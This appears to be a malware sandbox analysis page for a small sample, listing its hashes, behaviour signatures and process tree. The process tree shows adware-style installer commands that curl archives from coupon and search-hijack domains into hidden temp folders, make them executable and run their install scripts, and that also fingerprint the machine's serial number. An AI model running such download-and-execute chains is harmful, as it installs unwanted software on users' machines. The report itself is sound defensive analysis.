16df828c082d3c355a8ee2fcf986501bdf0ce39aa9700e2cb97964262138043b

Analysis

max time kernel
14s
platform
debian-9_mips
resource
debian9-mipsbe-20231215-en
resource tags

arch:mipsimage:debian9-mipsbe-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
10/01/2024, 02:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4f5678b1038d3a340904b783be836917
Size

10KB
MD5

4f5678b1038d3a340904b783be836917
SHA1

c60294f6db5e4cda63bae609d6f2736d6da1506c
SHA256

16df828c082d3c355a8ee2fcf986501bdf0ce39aa9700e2cb97964262138043b
SHA512

81b9d0b868bcb3f1a39df14808e099627ed8c491c728e072b1d865f8a95e582c55bae2adb4d4bb7228034fc61b38fefabfa42f1200db725ed924821a530ffb2f
SSDEEP

192:g0wiqcQGe5F1j5jpcaZi3LHVMyIu8bXcz6bevTWM3Tk3Sw3aDnaU:gpTGe5F1jNbZgsbW/mVMn5

Score

3^/10

Malware Config

Signatures

Reads runtime system information 11 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/stat	sudo

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc
File opened for modification	/tmp/sh-thd.fCpQ40

/tmp/4f5678b1038d3a340904b783be836917
/tmp/4f5678b1038d3a340904b783be836917
1⤵
PID:715
- /usr/bin/touch
  touch "/root/Library/Application Support/.upd2124"
  2⤵
  PID:726
- /bin/date
  date "+%Y%m%d%H%M%S"
  2⤵
  PID:741
- /bin/mkdir
  mkdir -p /private/tmp/.mmupdatescripts_20240110022814
  2⤵
  - Reads runtime system information
  PID:743
- /usr/bin/curl
  /usr/bin/curl -s -o /private/tmp/.mmupdatescripts_20240110022814/pwr.zip http://download.mycouponsmartmac.com/InstallerResources/pwr.zip
  2⤵
  PID:745
- /usr/bin/unzip
  /usr/bin/unzip /private/tmp/.mmupdatescripts_20240110022814/pwr.zip -d /private/tmp/.mmupdatescripts_20240110022814
  2⤵
  PID:746
- /bin/chmod
  /bin/chmod +x /private/tmp/.mmupdatescripts_20240110022814/mm-install-macos.app/Contents/MacOS/mm-install-macos
  2⤵
  PID:747
- /usr/bin/sudo
  sudo -u /private/tmp/.mmupdatescripts_20240110022814/mm-install-macos.app/Contents/MacOS/mm-install-macos
  2⤵
  - Reads runtime system information
  PID:748
- /bin/mkdir
  /bin/mkdir -p /private/tmp/.mmupdatescripts_20240110022814/.mcs
  2⤵
  - Reads runtime system information
  PID:752
- /usr/bin/curl
  /usr/bin/curl -s -L -o /private/tmp/.mmupdatescripts_20240110022814/.mcs/mcs.tar.gz http://download.mycouponsmartmac.com/InstallerResources/MMMyCouponsmart.tar.gz
  2⤵
  PID:753
- /usr/bin/tar
  /usr/bin/tar -xzf /private/tmp/.mmupdatescripts_20240110022814/.mcs/mcs.tar.gz -C /private/tmp/.mmupdatescripts_20240110022814/.mcs
  2⤵
  PID:754
- /bin/chmod
  /bin/chmod -R +x /private/tmp/.mmupdatescripts_20240110022814/.mcs/MMMyCouponsmart
  2⤵
  PID:755
- /private/tmp/.mmupdatescripts_20240110022814/.mcs/MMMyCouponsmart/install.sh
  /private/tmp/.mmupdatescripts_20240110022814/.mcs/MMMyCouponsmart/install.sh "-guid=33091585267703371" "-source=" "-macid=(stdin)= d41d8cd98f00b204e9800998ecf8427e"
  2⤵
  PID:757
- /bin/sleep
  /bin/sleep 3
  2⤵
  PID:758
- /bin/mkdir
  /bin/mkdir -p /private/tmp/.mmupdatescripts_20240110022814/.searchmine
  2⤵
  - Reads runtime system information
  PID:760
- /usr/bin/curl
  /usr/bin/curl -s -L -o /private/tmp/.mmupdatescripts_20240110022814/.searchmine/imsearch.tar.gz http://dl.searchmine.net/download/Mac/InstallerResources/imsearch.tar.gz
  2⤵
  PID:761
- /usr/bin/tar
  /usr/bin/tar -xzf /private/tmp/.mmupdatescripts_20240110022814/.searchmine/imsearch.tar.gz -C /private/tmp/.mmupdatescripts_20240110022814/.searchmine
  2⤵
  PID:762
- /bin/chmod
  /bin/chmod -R +x /private/tmp/.mmupdatescripts_20240110022814/.searchmine/searchmine
  2⤵
  PID:763
- /private/tmp/.mmupdatescripts_20240110022814/.searchmine/searchmine/install.sh
  /private/tmp/.mmupdatescripts_20240110022814/.searchmine/searchmine/install.sh -hpnt -ds "-guid=33091585267703371" "-source=" "-macid=(stdin)= d41d8cd98f00b204e9800998ecf8427e"
  2⤵
  PID:764
- /usr/bin/find
  find /Applications -mindepth 1 -maxdepth 1 -type d -exec basename "{}" ";"
  2⤵
  - Reads runtime system information
  PID:766
- /usr/bin/find
  find /root/Library/LaunchAgents -mindepth 1 -maxdepth 1 -type f -exec basename "{}" ";"
  2⤵
  - Reads runtime system information
  PID:775
- /usr/bin/find
  find /Library/LaunchAgents -mindepth 1 -maxdepth 1 -type f -exec basename "{}" ";"
  2⤵
  - Reads runtime system information
  PID:777
- /usr/bin/find
  find /Library/LaunchDaemons -mindepth 1 -maxdepth 1 -type f -exec basename "{}" ";"
  2⤵
  - Reads runtime system information
  PID:779

/usr/bin/awk
awk "-F\"" "/IOPlatformSerialNumber/{print \$(NF-1)}"
1⤵
- Reads runtime system information
PID:730

/usr/bin/tr
tr -d "\\n"
1⤵
PID:731

/usr/bin/openssl
openssl md5
1⤵
PID:733

/usr/bin/wc
wc -c
1⤵
PID:738

/usr/bin/tr
tr -d " "
1⤵
PID:739

/usr/bin/tail
tail -1
1⤵
PID:770

/bin/grep
grep -i installed
1⤵
PID:771

/usr/bin/wc
wc -l
1⤵
PID:772

/usr/bin/tr
tr -d " "
1⤵
PID:773

/usr/bin/tr
tr -d "\\n"
1⤵
PID:774

/bin/cat
cat
1⤵
PID:782

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/sh-thd.fCpQ40

Filesize
338B

MD5
7465fdf1a69a4d747e375cc5ad71d727

SHA1
61a88ffca6799d4299c06b028bcf145bc4fb31c7

SHA256
8c542559ee6c2a0c8205a5c03ce72a80f215e631ee4374420c5093db06003a0c

SHA512
2bc1c7ca6174979311c81cfb3295ecc42cba7730486343cf4e176b6e42bb3bdaee6b35b500aec3adf44638e270266ce2e05c8a2bd88965a912c11571a13c5555

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads